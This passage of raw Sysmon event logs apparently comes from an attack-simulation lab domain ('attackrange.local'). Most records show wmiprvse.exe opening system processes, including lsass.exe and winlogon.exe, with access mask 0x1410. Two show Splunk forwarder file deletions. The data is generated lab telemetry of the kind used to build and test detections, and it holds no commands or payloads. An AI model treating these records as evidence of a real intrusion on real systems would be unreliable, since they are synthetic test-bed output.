Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.546{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.530{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.515{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0614634BD6FB5F7302B306CA25FA66F1,SHA256=FCC1ABB97BF1622CAEA43FB944761569D74C0A5C5507DF422885C013AB6BE4A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002246868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.515{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=693C6558DC1C7395A4E17AD11A26739A,SHA256=7EB4C348C963AA16F1A05841668E6249C7FE693676DB68389C20DF139EF6954A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.499{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 